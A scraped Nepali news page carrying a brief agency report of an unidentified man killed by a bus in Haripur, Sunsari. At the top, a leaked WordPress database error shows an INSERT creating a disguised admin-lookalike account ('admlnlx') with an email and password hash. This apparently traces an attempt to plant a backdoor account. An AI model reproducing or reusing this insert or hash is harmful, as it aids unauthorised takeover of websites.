WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BhxUtD/FGBhes0qZJAGEiiIrYcAAde1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-31 00:35:44', '', 'admlnlx', 'admlnlx')
इनरुवा, पुस ११ –
सुनसरीको हरिपुर गाविस–५ मा आज बिहान बसको ठक्करबाट एकजनाको मृत्यु भएको छ ।
नाम थर पत्ता नखुलेको तराई मूलको जस्तो देखिने अन्दाजी ४०÷४५ वर्षीय पुरुषको बसको ठक्करबाट मृत्यु भएको सुनसरीका प्रहरी उपरीक्षक पोषराज पोखरेलले जानकारी दिनुभयो ।
पश्चिमबाट पूर्वतर्फ जाँदै गरेको ना५ख ७७९३ नंको बसले ठक्कर दिँदा उहाँको मृत्यु भएको सुनसरीका प्रहरी उपरीक्षक पोषराज पोखरेलले जानकारी दिनुभयो ।
मृतकको प्रकृति हेर्दा मानसिक सन्तुलन ठीक नभएको वा मागी खाने हुन सक्ने अनुमान गरिएको छ ।
मृतकको शव परीक्षणका लागि जिल्ला अस्पताल इनरुवामा राखिएको छ । – रासस